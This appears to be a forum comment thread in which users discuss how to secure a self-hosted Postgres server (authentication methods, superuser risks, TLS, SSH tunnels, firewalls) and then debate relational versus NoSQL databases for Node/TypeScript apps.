So this is cool, and can serve as a good cheatsheet for beginners.
However, the question where I struggled the most: how the hell do I set up a secure Postgres instance on some cloud VM or server? (I _really_ love those 2.50 bucks per month instances)
I spent a fair amount of time reading up on it, but it's still really easy to make a mistake in your `pg_hba.conf` or somehwere else. I remember disabling password based login, and just authenticating over SSH, and my server still got compromised after a day or two. 100% my fault - I think it was related to `COPY FROM/TO` being able to run arbitrary commands because I didn't understand that `postgres` is regarded as a superuser by the database.
I've been using managed services like Heroku Postgres and RDS ever since.
Point is: it would be of huge value to have a clear (but complete) overview of how to configure a Postgres instance so that it's secure in the basic sense. If that isn't possible (or very hard) then please let's collectively tell beginners to just use managed instances.
There ARE _almost_ clear guides about how to setup an RDS instance (and a basic webserver if you want) including networking, from AWS itself, it's just these guides are buried under teams of SEOed listicle crap and mediocre medium posts with no information. Will find and update this post.
Before anyone can reasonably answer this (and maybe dba.stackexchange.com would be a better place to ask) can you 100% confirm that the issue can't come from your ssh setup?
> I remember disabling password based login, and just authenticating over SSH, and my server still got compromised after a day or two.
This sentence in particular is hard to parse. Did you turn off password login in pg_hba.conf or in your sshd_config ?
PS: VPS box literally start being scanned/tested over standard ssh port minutes after being spin-up. It seem less frequent however to be attacked for specific postgreSQL vulnerabilities (but that might well be a new trend).
Have you read the official docs on the Postgres site? Most of that stuff is covered there. Not everything has to be in a blog post when the official docs already cover it.
I'm not sure where you went wrong; by default, Postgres is secure; the configuration listens on localhost and even if you change that, does not allow network access to the superuser. Distributions may ship with less secure configurations but I'm not aware of any that do.
I'm also pretty sure that the upstream documentation warns against using the superuser for application access, so if you just create a regular database user protected by a reasonable password it will be as secure as any database exposed to a network can be; of course, exposing databases to the internet is something to be avoided in the first place.
non-mobile EDIT:
The above ignores TLS, which is generally a good idea if you want to make something accessible over the network.
A guide for beginners might be useful, but if you work with these things, it may be useful to learn how to approach security in general so that you will be able to learn how to secure anything, or at least know when you don't know enough.
In general, installing services securely requires the administrator to understand how the service is accessed by legitimate users and whether in doing so is potentially exposed to external access. If you just google for how-tos you're quite likely to find lots of bad advice that skips security considerations and takes you from A to B the fastest route.
The effort required is entirely dependent on your requirements; in most cases, avoiding exposure to the internet, patching your software and using strong passwords is enough, as it stops nearly all low-effort automated attacks.
For starters with any network-exposed service, you should understand that not exposing it to the internet in the first place means that the rest of your security measures will be challenged less; so if you can, limit access to internal networks and specific hosts with firewalls and ACLs.
If you have to expose a service to the internet, then you need authentication and authorization; anyone will be able to connect to the service, but the service should challenge them to identify themselves using secure credentials.
Once the user has access to your service, you'll want to limit what they can do with it. This requires reading the manual.
Lastly, you'll generally want to keep your software up-to-date; unpatched software may have bugs that allow attackers to bypass some of the security measures you have set up.
> A guide for beginners might be useful, but if you work with these things, it may be useful to learn how to approach security in general so that you will be able to learn how to secure anything, or at least know when you don't know enough.
That's a tricky question. Personally, I find that while reading about something is a good way to gain a vague understanding of how something works, to actually integrate it, I need to actually get a system set up and then just dig around and see how things interact.
What could work is something akin to a Wikipedia dive. Pick a system to set up and make note of as many concepts along the way as you can; For example, setting up a Postgres database involves networking (what does a "listen address" actually mean?), different kinds of authentication (eg. pg_hba md5, trust, and peer authentication options), OS users and database users (easy to get those two confused), among other things. One could also wonder why there's a database superuser, and what makes the system such that using it for application access it is a bad idea?
Then try thinking about potential ways of how all these things could interact to break a system. This can give you a lot of insight into how to secure systems against attackers.
For example, setting up Postgres to not authenticate users is not necessarily detrimental to the overall security of a system if everything is local and single-user, but makes the system extremely weak if any component on the host is exploitable from the outside.
So even if you really don't want to use passwords, you should at the very least use peer authentication where the database allows only specified OS users to connect such that any attacker must at least be able to access the system as one of those users.
Lastly, if you put a non-authenticating system on a network, it should not be surprising that anyone who happens to be able to poke at your network address can just waltz in without resistance. You'll at the very least want strong passwords, possibly with brute force detection to detect people trying to guess credentials. The IPv4 internet is only about 4 billion addresses, and automatically scanning through them for listening services is routine for attackers. :)
> Then try thinking about potential ways of how all these things could interact to break a system.
This is where your advice goes south, IMHO. The sysadmin can't think of every possible way his system can get compromised -- they are not paid for that, black-hat hackers are.
Instead of collecting settings from a hundred places that must be set correctly for production, and inventing ways the system can get compromised, the safe settings could be provided in one place: ideally in the default settings so they are impossible to miss, or in a list, such as Django's deployment checklist [1].
Not saying that Postgres doesn't provide such a list, although googling for "checklist site:postgresql.org" only resulted in a mailing list reply [2], with some points not trivial to follow. Please comment below if you know an official one.
Of course you don't need to think of every possible way to compromise a system; just enough to reasonably protect against your threat model given the resources you have. If you have a complicated system that requires "hundreds of settings", then you just have to put more effort in making sure you don't miss anything.
I'm pretty sure most security breaches are caused by really basic configuration mistakes (or process failures). following a checklist can definitely be effective, but if you don't actually understand why you're configuring things as you are, you're likely to make mistakes elsewhere.
Who knows! That's my struggle with security, unless you have good monitoring in place it's not even trivial to notice problems.
In my case I was only made aware of the compromised VM because my hosting provider sent me very stern email about my server's IP netscanning their entire fricking address range.
How about try setting up a box with exactly same steps that you would do for your database instance except actually installing the database? Yes, please include all the steps that you may consider "irrelevant without a database installation", they may well be important.
I guess that the docker image doesn't use TLS for connections, or if it does it doesn't use certificates from a CA.
This means that your data either goes in plain text over the network, or might be vulnerable to a MITM attack (if you don't manage your certs correctly).
I also guess that you don't use SCRAM as the password hashing method, but rather MD5. That means that if someone is able to listen to the connection, they can do a replay attack using the password hash, as there is only 32 bits of entropy added to the hash from the server side. And once you have managed to do the replay attack you can issue arbitrary sql commands as that user.
For about $7-8/month, you get a managed one on GCP with Cloud SQL. It isn't perfect for all use cases, but has been fantastic in terms of developing out a small app.
My experience is that managed services are either way too expensive or badly managed enough that doing anything different from the basics is a endless source of problems.
>Bit worried about the quality of the content, based on the quality of the proofreading.
I don't know why this feeling persists. The ability to proofread or write free of spellings is a skill completely unrelated to the underlying content. Complaining about the spelling just seems childish at this point. We live in a world full of mistakes and problems. Dealing with life despite of them is a fundamental life skill.
There's definitely a middle ground here. I have been in academic contexts where every sentence has to be absolute perfection before we submit for publication. Thats overkill, for sure, but there is merit to proofreading as a sign of legitimacy of the argument itself. Some dude literally wrote this text and didn't even re-read the post before publishing. Clearly, he's either the greatest expert at technological things that it's second nature to him even more than LANGUAGE, or he just did a shoddy job on both sides. Unless I see the name to be Linus Torvalds or something, I'm just going to assume this post is low quality in general.
> The ability to proofread or write free of spellings is a skill completely unrelated to the underlying content.
It's not about the ability, but the willingness. I think it would be amoral to tolerate those bums who externalise costs onto the reader. https://www.fourmilab.ch/documents/strikeout/
The official documentation is pretty damn good. Most of the time when I needed to learn something about Postgres, it had all the answers I needed, and in rare occasions it didn't, I used Stack Overflow to figure out what other part of the manual I needed to read.
If you need remote access to the DB, then you need remote access. Most people in a normal setup would not have the database server ports directly exposed to the Internet, but if you have the perspective that all servers are in the cloud, then you would also be expected to know how to keep them secure.
But making it listen on an external IP does not inherently make it insecure, as long as you also have other firewall and user account controls.
I don't know much about Postgres specifically, but what I'm seeing in the tutorial does seem insecure.
> If you need remote access to the DB, then you need remote access
That's not a defence for teaching insecure practices. It's possible to configure Postgres for secure remote access.
Using md5 for password security seems like a red flag, and sure enough, the Postgres docs remind us that md5 should no longer be considered secure. [0] I don't think there's any verification of the server's fingerprint, either.
There's really no excuse here, as there's a quick and easy way to do it: SSH tunnels. [1]
> Most people in a normal setup would not have the database server ports directly exposed to the Internet
Not a safe assumption. Instances on Linode and, iirc, Digital Ocean, are not behind a cloud firewall, all ports are wide open to the Internet. (I think that's a bad move on the part of Linode and Digital Ocean, but that's not the point.)
> if you have the perspective that all servers are in the cloud, then you would also be expected to know how to keep them secure
If you already knew how to securely configure Postgres, you wouldn't need the tutorial.
> making it listen on an external IP does not inherently make it insecure, as long as you also have other firewall and user account controls
Is there a good way to embed postgres in applications? I've preferred sqlite, but would like to just use postgres everywhere, but requiring users to install it as a service and maintain that globally just makes it unreliable for embedding.
Related side note/question. I was on a project recently where postgres was used with a NodeJS JavaScript server app. It seems a bit backwards. Like you have the flexibility of a loosely typed server app but all the annoyance of a RDBMS. It just made development a nightmare. The 'strictness' if the system was just backwards.
Surely NoSQL + typescript is better for development (and potentially for performance).
I see it the other way around. Code is fluid, data persists. So I would expect more rigor in the design of the schema then anywhere in the code. And hopefully with some fore-sight, you won't have to change it every other day. Migrating the data requires also some reflection.
No amount of work of coding will fix your data, if it is a mountain of inconsistent garbage.
I guess with experience comes the ability to correctly design the schema from day one. The project was just getting off the ground so schema was evolving constantly. If only there was such a thing as pgconfig.json which allows me to configure how strict I want the db to be - a sliding scale between NoSQL to SQL.
No one gets the schema right from the beginning. Waterfall is out of fashion for a reason. And there are schema migration frameworks out there for that purpose.
If you care for the data you store, you'll have to take care of your data. ACID and the "rigidness" of schemata are tools for that, and to keep the complexity in check.
It is much easier than accruing technical debt by having unstructured data and having later to figure out to make heads and tails of what you and your colleagues did at some arbitrary earlier time. (Not that crappy SQL designs don't have that problem).
If you don't care for your data, as you are in the beginning, why don't you create the DB then from scratch? You can use various editors to create the schemata from tools you are more comfortable with.
Don't work against the tool, and find the slider in your head to adjust your way of working.
This is already solved in most server-side frameworks by using a schema migration tool. Heck, even wordpress has an easy way to automatically update a table's schema. The development of these tools in nodejs land are probably stalled due to nodejs community's obsession with nosql databases, but I bet there are several solutions available right now to handle this task.
As someone who works on a business app using CouchDB+Typescript, I can tell you that (a) you will also hit the edge cases of NoSQL, like transactions and joins, and it will not be that awesome either and (b) at some point you'll realize that you'll need to do schema validation still. Frontend bugs, possibly malicious clients and protected attributes (i.e. 'disabled' should only be set by an admin) will force you to write a lot of validation anyway.
It definitely allows for faster iteration, though. You can deploy a prototype or change very quickly without caring about this, which is pretty nice. But you need to keep track of that and pay the debt if you use the prototype.
Overall, I think it would not give or take much if we'd be using PostgreSQL+some JSON column for general data instead of CouchDB. You just need to know your stack and its drawbacks and work with them.
I have written a lot of server side code in dynamically typed languages (mostly Python) with a variety of database systems (I started my career in the mid 2000s on ZODB, an object-oriented database).
At least in my experience the "philosophical" language-database pairing always ended up being much less important than the database own strength and weaknesses in regards to the problem being solved.
For me Postgres is the best default choice if you don't understand that well where your project/product is going (Not saying it isn't a good choice later on as well). Out of the box it handles pretty much every use case I encountered at least good enough for a long time without adding supplemental data stores or ugly hacks.
For me the difference in development barely matters. Locally schema changes are pretty much friction-less with the right tooling, and in production the problem is usually not changing the schema, but the existing data. The latter being a pain in any tech I have used so far, because often it is not even an engineering challenge but a matter of business decisions.
I've done this before (postgREST) for internal apps and it's amazing. You can POST a JSON file to the front end from a shell script with curl and have it show up on a Grafana dashboard immediately. I've used this in the past for setting up automated quality tests for machine learning pipelines -- the pipeline runs automatically and you get the results in a central place, so you can see how your quality metrics are trending over time.
Given that postgREST exists, I don't see any reason to talk to postgres directly from a JS app.
As someone who loves JavaScript and used MongoDB in a serious, professional setting - you are eventually doing more work with Mongo to keep data in sync than with any relational database.
Most systems do not need no-SQL. The only reason to use no-sql is when you are allowing users to create completely dynamic form schemas and JSON and when your product is garbage and you need a "quick" db for prototyping.
That's not to mention that when your product grows and you are selling to "serious" corporations, they ask you to integrate with third-party data visualization / analysis software. They claim to support MongoDB/No-SQL in their marketing material, but virtually none of them do, and you are mapping back to SQL. That's when the cost of using no-SQL really hits, several years down the line.
> our product is garbage and you need a "quick" db for prototyping.
Yep that's the stage the project was at.
Integrating the DB with grafana was a breeze though so that's definitely a benefit. I've personally never tried to hook up a MongoDB to Grafana, wonder if it's any easier.
This is my primary stack now, except for Typescript instead of Javascript, and I absolutely love it.
First, the ideological thing: flexibility is an awful thing for user's data and logical relationships within it. The fact that with RDBMS you have to define your schema and follow it, makes many classes of erros that would have been corrupted data at operations to being exceptions at development: PostgreSQL just won't let you shoot yourself in the foot like that. And with pgtyped, which I'm growing to love, you don't even have to write any boilerplate: just write plain straightforward SQL, run verification against your test database, and get all of your types for free.
But that's not even the most important part; what I absolutely love about SQL is my ability to delegate huge amounts of work from my app server to my db server, saving a lot of latency and CPU. It may not be that critical for things when you just update one row in the 'users' table, but when you have O(n) updates and up, it's just great to be able to do things directly in the database.
And in rare occasions where you absolutely have to use non-structured data (or data with a lot of different data types that don't deserve their own columns), jsonb is useful and pretty damn fast if you think throught the schema and make use of the GIN indexes.
thanks for the pgtyped recommendation! I guess I was just frustrated with the constant moaning from the DB side when schemas were constantly being reconsidered. JSONb to the rescue though!
I think it's a good compromise. You're accepting a lot of looseness and fault-tolerance on the application side, but you have guaranteed safety of your underlying data.
What scares me more than anything else is lost / compromised / invalid data. That's hard to fix. The frontend code is straightforward to fix, relatively speaking.
I forgot to mention this was at a startup on ground level. Regular data backups always soothes my nerves. Eventually it makes sense to have type/db strictness on both app and db side however it just felt like wading through quicksand with a small team where we should be sprinting and db structure is fluid and ever changing
When you have the tooling in place, it’s relatively easy to remodel your data in Postgres. I use alembic (python), so most of the schema changes are handled for me - and then I need to write any updates to fill in the gaps. It doesn’t matter what you’re using though, if you’re restructuring data, you need to handle the changes yourself to get from one consistent state to another. Postgres allows you to do this so you you don’t end up in some horrible halfway house where you’ve kinda migrated, but kinda not because you missed something. DB level constraints are the best, especially when you have a bunch of legacy data to worry about.
> The 'strictness' if the system was just backwards.
IMO, the strictness was in the right place (the source of truth), what was probably backwards is the team’s relative skill and tooling for adapting the solution. Which might make it wrong for the team, if it is otherwise right for the situation.
I don't understand why I've been downvoted to -3 here. I'm sure if I just showed off how much I hate technology and live in a cave then I'd get lots of upvotes. Hacker news is wild.
However, the question where I struggled the most: how the hell do I set up a secure Postgres instance on some cloud VM or server? (I _really_ love those 2.50 bucks per month instances)
I spent a fair amount of time reading up on it, but it's still really easy to make a mistake in your `pg_hba.conf` or somehwere else. I remember disabling password based login, and just authenticating over SSH, and my server still got compromised after a day or two. 100% my fault - I think it was related to `COPY FROM/TO` being able to run arbitrary commands because I didn't understand that `postgres` is regarded as a superuser by the database.
I've been using managed services like Heroku Postgres and RDS ever since.
Point is: it would be of huge value to have a clear (but complete) overview of how to configure a Postgres instance so that it's secure in the basic sense. If that isn't possible (or very hard) then please let's collectively tell beginners to just use managed instances.